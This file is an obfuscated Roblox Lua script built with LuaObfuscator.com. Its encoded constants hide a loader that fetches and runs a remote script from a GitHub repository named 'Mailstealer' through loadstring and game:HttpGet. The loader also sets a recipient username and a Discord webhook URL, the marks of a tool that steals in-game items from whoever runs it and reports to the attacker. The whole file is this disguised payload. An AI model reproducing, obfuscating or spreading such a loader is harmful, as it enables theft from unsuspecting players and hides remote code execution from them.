--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v103=0;local v104;while true do if (v103==0) then v104=v5(v85,v19);v19=nil;v103=1;end if (v103==1) then return v104;end end else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v86-(v86%((1809 -(282 + 595)) -((2494 -(1523 + 114)) + 74))) ;else local v87=568 -(367 + 201) ;local v88;while true do if (v87==0) then v88=(929 -(214 + 641 + 72))^(v32-1) ;return (((v31%(v88 + v88))>=v88) and (1 + (0 -0))) or (0 + 0) ;end end end end local function v21()local v34=0;local v35;while true do if (v34==1) then return v35;end if (v34==(1065 -(68 + (1114 -(32 + 85))))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end local function v24()local v42=350 -(87 + (839 -576)) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==0) then v43=v23();v44=v23();v42=(78 + 103) -((118 -51) + 113) ;end if (1==v42) then v45=1;v46=(v20(v44,1 + 0 ,49 -29 ) * ((2 + 0)^((565 -(145 + 293)) -(525 -(44 + 386))))) + v43 ;v42=954 -(802 + 150) ;end if (v42==(5 -3)) then v47=v20(v44,37 -16 ,23 + 8 );v48=((v20(v44,(2515 -(998 + 488)) -(915 + 82) )==(2 -1)) and  -1) or 1 ;v42=1 + 1 + 1 ;end if (v42==(3 -0)) then if (v47==(1187 -(1069 + 118))) then if (v46==(0 -(0 + 0))) then return v48 * (0 -0) ;else local v105=0 + 0 ;while true do if (v105==0) then v47=1 -0 ;v45=0 + 0 ;break;end end end elseif (v47==2047) then return ((v46==(791 -(368 + 423))) and (v48 * ((3 -2)/((790 -(201 + 571)) -(10 + 8))))) or (v48 * NaN) ;end return v8(v48,v47-(3934 -2911) ) * (v45 + (v46/(2^((1632 -(116 + 1022)) -(416 + 26))))) ;end end end local function v25(v49)local v50=0 -0 ;local v51;local v52;while true do if (v50==2) then v52={};for v92=1 + (1423 -(630 + 793)) , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=3;end if (v50==((9 -6) -2)) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=861 -(814 + 45) ;end if (v50==((33 -26) -4)) then return v6(v52);end if (v50==(0 + 0)) then v51=nil;if  not v49 then local v98=0 + 0 + 0 ;while true do if (v98==(885 -(261 + 624))) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=1081 -((3511 -2491) + (1807 -(760 + 987))) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v53~=1) then else v56=nil;v57=nil;v53=1441 -(179 + 1260) ;end if (v53==4) then v62=nil;while true do if (v54~=4) then else while true do if (v55~=(1921 -(157 + 1761))) then else v62=nil;while true do local v113=747 -(719 + 28) ;while true do if (v113==(1 -0)) then if (v56~=2) then else local v170=0;local v171;local v172;while true do if (v170~=0) then else v171=0;v172=nil;v170=1;end if (v170==(2 -1)) then while true do if (v171~=(0 -0)) then else v172=0 + 0 ;while true do local v174=0;local v175;while true do if (v174~=(0 + 0)) then else v175=0 + 0 ;while true do if (v175~=(0 + 0)) then else if (v172==(1 + 0)) then return v60;end if (v172~=(0 -0)) then else local v183=0;local v184;while true do if (v183~=(0 -0)) then else v184=0 -0 ;while true do if (v184==0) then local v189=0;while true do if ((0 + 0)~=v189) then else for v198=1,v23() do local v199=0;local v200;local v201;local v202;while true do if (v199==1) then v202=nil;while true do if (v200~=0) then else local v206=0;while true do if (v206==0) then v201=0;v202=nil;v206=4 -3 ;end if (1==v206) then v200=1;break;end end end if (v200~=1) then else while true do if (v201~=0) then else v202=v21();if (v20(v202,1,1)~=(753 -(239 + 514))) then else local v212=0;local v213;local v214;local v215;local v216;local v217;while true do if (v212~=0) then else v213=0 + 0 ;v214=nil;v212=1;end if (v212==2) then v217=nil;while true do if (v213==1) then local v218=1329 -(797 + 532) ;while true do if (v218==0) then local v220=0;while true do if (v220~=0) then else v216=nil;v217=nil;v220=1 + 0 ;end if ((1 + 0)~=v220) then else v218=2 -1 ;break;end end end if (v218~=(1203 -(373 + 829))) then else v213=2;break;end end end if (v213~=(733 -(476 + 255))) then else while true do if (v214==(1132 -(369 + 761))) then local v221=0 + 0 ;local v222;local v223;while true do if (v221~=(0 -0)) then else v222=0;v223=nil;v221=1;end if (v221==1) then while true do if (v222~=(0 -0)) then else v223=0;while true do if (v223==(239 -(64 + 174))) then v214=3;break;end if (v223~=(0 + 0)) then else if (v20(v216,1 -0 ,1)~=1) then else v217[2]=v62[v217[2]];end if (v20(v216,338 -(144 + 192) ,218 -(42 + 174) )==(1 + 0)) then v217[3]=v62[v217[3]];end v223=1;end end break;end end break;end end end if (v214==1) then local v224=0;local v225;local v226;while true do if (v224~=(0 + 0)) then else v225=0 + 0 ;v226=nil;v224=1;end if (v224==(1505 -(363 + 1141))) then while true do if ((1580 -(1183 + 397))==v225) then v226=0 -0 ;while true do if (v226~=1) then else v214=2;break;end if (v226~=0) then else local v233=0 + 0 ;local v234;while true do if (v233~=0) then else v234=0;while true do if (v234==1) then v226=1 + 0 ;break;end if (v234==0) then local v241=0;while true do if (0~=v241) then else v217={v22(),v22(),nil,nil};if (v215==(0 -0)) then local v242=1661 -(1477 + 184) ;local v243;local v244;while true do if (v242~=0) then else local v246=0;while true do if (v246==0) then v243=0;v244=nil;v246=1 -0 ;end if (v246==(1 + 0)) then v242=857 -(564 + 292) ;break;end end end if ((1 -0)~=v242) then else while true do if (v243~=(0 -0)) then else v244=0;while true do if (v244~=(304 -(244 + 60))) then else v217[3]=v22();v217[4 + 0 ]=v22();break;end end break;end end break;end end elseif (v215==1) then v217[3]=v23();elseif (v215==2) then v217[479 -(41 + 435) ]=v23() -(2^16) ;elseif (v215~=(1004 -(938 + 63))) then else local v248=0 + 0 ;local v249;local v250;local v251;while true do if (v248~=0) then else v249=1125 -(936 + 189) ;v250=nil;v248=1;end if (v248==1) then v251=nil;while true do if (v249==1) then while true do if (v250~=0) then else v251=0 + 0 ;while true do if (v251~=(1613 -(1565 + 48))) then else v217[2 + 1 ]=v23() -(2^(1154 -(782 + 356))) ;v217[271 -(176 + 91) ]=v22();break;end end break;end end break;end if (v249~=0) then else local v254=0 -0 ;while true do if (v254==0) then v250=0;v251=nil;v254=1 -0 ;end if (v254~=(1093 -(975 + 117))) then else v249=1876 -(157 + 1718) ;break;end end end end break;end end end v241=1;end if (v241~=(1 + 0)) then else v234=3 -2 ;break;end end end end break;end end end end break;end end break;end end end if (v214~=(10 -7)) then else if (v20(v216,3,3)~=(1019 -(697 + 321))) then else v217[10 -6 ]=v62[v217[8 -4 ]];end v57[v198]=v217;break;end if (v214==(0 -0)) then local v228=0;local v229;local v230;while true do if (v228==1) then while true do if (v229==(0 + 0)) then v230=0;while true do if (v230~=(1 -0)) then else v214=1;break;end if (v230==0) then local v235=0;local v236;while true do if (v235==(0 -0)) then v236=0;while true do if (v236~=0) then else v215=v20(v202,1229 -(322 + 905) ,3);v216=v20(v202,615 -(602 + 9) ,1195 -(449 + 740) );v236=1;end if (v236==(873 -(826 + 46))) then v230=948 -(245 + 702) ;break;end end break;end end end end break;end end break;end if (v228~=(0 -0)) then else v229=0;v230=nil;v228=1 + 0 ;end end end end break;end if (v213~=0) then else v214=1898 -(260 + 1638) ;v215=nil;v213=441 -(382 + 58) ;end end break;end if (v212~=1) then else v215=nil;v216=nil;v212=2;end end end break;end end break;end end break;end if (v199~=0) then else v200=0 -0 ;v201=nil;v199=1;end end end for v203=1,v23() do v58[v203-(1 + 0) ]=v28();end v189=1;end if (v189~=1) then else v184=1 -0 ;break;end end end if (1~=v184) then else v172=1;break;end end break;end end end break;end end break;end end end break;end end break;end end end break;end if (v113==(0 -0)) then local v159=0;local v160;while true do if (v159==0) then v160=1205 -(902 + 303) ;while true do if (v160~=(0 -0)) then else local v173=0;while true do if (v173==(0 -0)) then if (v56==(0 + 0)) then local v176=1690 -(1121 + 569) ;local v177;local v178;while true do if (v176~=(215 -(22 + 192))) then else while true do if (v177==(683 -(483 + 200))) then v178=1463 -(1404 + 59) ;while true do if ((5 -3)~=v178) then else v56=1;break;end if (0~=v178) then else local v185=0;local v186;while true do if (v185~=0) then else v186=0 -0 ;while true do if ((765 -(468 + 297))==v186) then v57={};v58={};v186=1;end if (v186~=(563 -(334 + 228))) then else v178=3 -2 ;break;end end break;end end end if (v178==(2 -1)) then local v187=0 -0 ;while true do if (v187==(0 + 0)) then v59={};v60={v57,v58,nil,v59};v187=237 -(141 + 95) ;end if (v187~=1) then else v178=2 + 0 ;break;end end end end break;end end break;end if (v176==0) then v177=0 -0 ;v178=nil;v176=1;end end end if (v56~=(2 -1)) then else local v179=0 + 0 ;while true do if (v179==(2 -1)) then local v180=0 + 0 ;local v181;while true do if ((0 + 0)~=v180) then else v181=0;while true do if (v181~=(1 -0)) then else v179=2 + 0 ;break;end if (v181==(163 -(92 + 71))) then local v188=0 + 0 ;while true do if (0==v188) then for v191=1,v61 do local v192=0;local v193;local v194;local v195;local v196;local v197;while true do if (0==v192) then v193=0 -0 ;v194=nil;v192=1;end if (v192~=2) then else v197=nil;while true do if ((766 -(574 + 191))==v193) then local v205=0 + 0 ;while true do if (1==v205) then v193=4 -2 ;break;end if (v205~=(0 + 0)) then else v196=nil;v197=nil;v205=850 -(254 + 595) ;end end end if (v193==(128 -(55 + 71))) then while true do if (v194~=0) then else local v207=0;while true do if (v207==(0 -0)) then v195=1790 -(573 + 1217) ;v196=nil;v207=2 -1 ;end if (v207==(1 + 0)) then v194=1;break;end end end if (v194==1) then v197=nil;while true do if (v195~=0) then else local v208=0 -0 ;local v209;local v210;while true do if (v208==1) then while true do if (v209~=0) then else v210=939 -(714 + 225) ;while true do if (v210~=(0 -0)) then else local v219=0;while true do if (v219==(1 -0)) then v210=1;break;end if (v219~=(0 + 0)) then else v196=v21();v197=nil;v219=1;end end end if (v210==(1 -0)) then v195=807 -(118 + 688) ;break;end end break;end end break;end if (v208~=0) then else v209=0;v210=nil;v208=49 -(25 + 23) ;end end end if (v195~=1) then else if (v196==(1 + 0)) then v197=v21()~=(1886 -(927 + 959)) ;elseif (v196==(6 -4)) then v197=v24();elseif (v196~=3) then else v197=v25();end v62[v191]=v197;break;end end break;end end break;end if (v193==(732 -(16 + 716))) then v194=0;v195=nil;v193=1 -0 ;end end break;end if (v192~=(98 -(11 + 86))) then else v195=nil;v196=nil;v192=4 -2 ;end end end v60[3]=v21();v188=1;end if ((286 -(175 + 110))~=v188) then else v181=2 -1 ;break;end end end end break;end end end if (v179==(9 -7)) then v56=1798 -(503 + 1293) ;break;end if (v179~=(0 -0)) then else local v182=0 + 0 ;while true do if (0~=v182) then else v61=v23();v62={};v182=1;end if (v182~=1) then else v179=1;break;end end end end end v173=1062 -(810 + 251) ;end if (v173==(1 + 0)) then v160=1;break;end end end if (v160~=(1 + 0)) then else v113=1;break;end end break;end end end end end break;end if (v55~=(0 + 0)) then else local v108=0;local v109;while true do if (v108~=(533 -(43 + 490))) then else v109=0;while true do if (v109==(733 -(711 + 22))) then v56=0 -0 ;v57=nil;v109=1;end if (v109==1) then v55=860 -(240 + 619) ;break;end end break;end end end if (v55==(1 + 0)) then local v110=0 -0 ;while true do if (v110~=0) then else v58=nil;v59=nil;v110=1;end if (v110==(1 + 0)) then v55=2;break;end end end if (v55~=2) then else local v111=0;local v112;while true do if (v111==(1744 -(1344 + 400))) then v112=0;while true do if (v112~=(406 -(255 + 150))) then else v55=3;break;end if (v112==(0 + 0)) then v60=nil;v61=nil;v112=1 + 0 ;end end break;end end end end break;end if (v54==(8 -6)) then local v99=0 -0 ;while true do if (v99==1) then v54=1742 -(404 + 1335) ;break;end if (v99~=0) then else v59=nil;v60=nil;v99=1;end end end if (v54~=(406 -(183 + 223))) then else local v100=0 -0 ;while true do if (v100==0) then v55=0;v56=nil;v100=1 + 0 ;end if (v100~=(1 + 0)) then else v54=338 -(10 + 327) ;break;end end end if (v54==3) then local v101=0 + 0 ;while true do if (v101~=(339 -(118 + 220))) then else v54=4;break;end if (v101~=(0 + 0)) then else v61=nil;v62=nil;v101=1;end end end if (v54~=1) then else local v102=0;while true do if (v102==(450 -(108 + 341))) then v54=1 + 1 ;break;end if (v102==(0 -0)) then v57=nil;v58=nil;v102=1494 -(711 + 782) ;end end end end break;end if (v53~=0) then else v54=0;v55=nil;v53=1;end if ((3 -1)~=v53) then else v58=nil;v59=nil;v53=472 -(270 + 199) ;end if (v53~=(1 + 2)) then else v60=nil;v61=nil;v53=1823 -(580 + 1239) ;end end end local function v29(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v69=v66;local v70=v67;local v71=v68;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=5) then if (v82<=2) then if (v82<=0) then v79[v81[2]]();elseif (v82>1) then do return;end else local v114=0;local v115;local v116;while true do if (v114==1) then v79[v115 + 1 ]=v116;v79[v115]=v116[v81[4]];break;end if (v114==0) then v115=v81[2];v116=v79[v81[3]];v114=1;end end end elseif (v82<=3) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82==4) then v65[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v65[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v73=v81[3];else v73=v81[3];end elseif (v82<=8) then if (v82<=6) then v65[v81[3]]=v79[v81[2]];elseif (v82>7) then v79[v81[2]]=v81[3];else local v125=0;local v126;local v127;local v128;local v129;while true do if (2==v125) then for v167=v126,v74 do v129=v129 + 1 ;v79[v167]=v127[v129];end break;end if (v125==1) then v74=(v128 + v126) -1 ;v129=0;v125=2;end if (v125==0) then v126=v81[2];v127,v128=v72(v79[v126](v13(v79,v126 + 1 ,v81[3])));v125=1;end end end elseif (v82<=10) then if (v82>9) then v79[v81[2]]=v81[3]~=0 ;else local v131;local v132,v133;local v134;local v135;v65[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v65;else v79[v81[2]]=v65[v81[3]];end v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v65;else v79[v81[2]]=v65[v81[3]];end v73=v73 + 1 ;v81=v69[v73];v135=v81[2];v134=v79[v81[3]];v79[v135 + 1 ]=v134;v79[v135]=v134[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v135=v81[2];v132,v133=v72(v79[v135](v13(v79,v135 + 1 ,v81[3])));v74=(v133 + v135) -1 ;v131=0;for v147=v135,v74 do v131=v131 + 1 ;v79[v147]=v132[v131];end v73=v73 + 1 ;v81=v69[v73];v135=v81[2];v79[v135]=v79[v135](v13(v79,v135 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];end elseif (v82>11) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v65;else v79[v81[2]]=v65[v81[3]];end else local v145=v81[2];v79[v145]=v79[v145](v13(v79,v145 + 1 ,v74));end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D65030F3O0063612O6C6D656E616D6567686F737403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313O3835382O363O38303439383639382F385A386C6E5142545562594669745F67664F4D714D536F39636543546141327A51702O6C4C397538774B6753545A6C2D494D5532484E544B4F4A796A396C63643570754E00163O0012083O00013O0026033O000D000100020004053O000D00012O000A000100013O001209000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026033O0001000100010004053O00010001001208000100093O001204000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00023O00017O00",v9(),...);
